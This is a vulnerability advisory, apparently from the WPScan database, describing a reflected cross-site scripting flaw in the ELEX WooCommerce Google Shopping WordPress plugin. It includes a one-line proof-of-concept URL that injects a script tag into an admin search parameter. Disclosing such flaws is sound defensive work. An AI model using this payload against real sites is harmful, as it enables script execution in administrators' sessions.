ELEX WooCommerce Google Shopping < 1.2.4 – Reflected Cross-Site Scripting (XSS)

Description

The plugin does not sanitise or escape the search GET parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue, which will be executed in a logged in admin context

Proof of Concept

https://example.com/wp-admin/admin.php?page=elex-product-feed-manage&search="><script>alert(/XSS/)</script>

Affects Plugins

elex-woocommerce-google-product-feed-plugin-basic

Fixed in 1.2.4

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

8.8 (high)

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

647448d6-32c0-4b38-a40a-3b54c55f4e2e

Timeline

Publicly Published

2021-09-06 (about 4 years ago)

Added

2021-09-06 (about 4 years ago)

Last Updated

2021-09-06 (about 4 years ago)

Other

Published

Title

Published

2025-01-16

Title

ReadMe Creator <= 1.0 - Reflected Cross-Site Scripting

Published

2014-12-05

Title

Shariff for WordPress <= 1.0.7 - Stored Cross-Site Scripting (XSS)

Published

2025-12-11

Title

WPGancio <= 1.12 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes

Published

2025-06-13

Title

Click to Chat < 4.23 - Contributor+ Stored XSS via data-no_number Parameter

Published

2014-10-11

Title

WooCommerce Store Exporter 1.7.5 - Cross Site Scripting (XSS)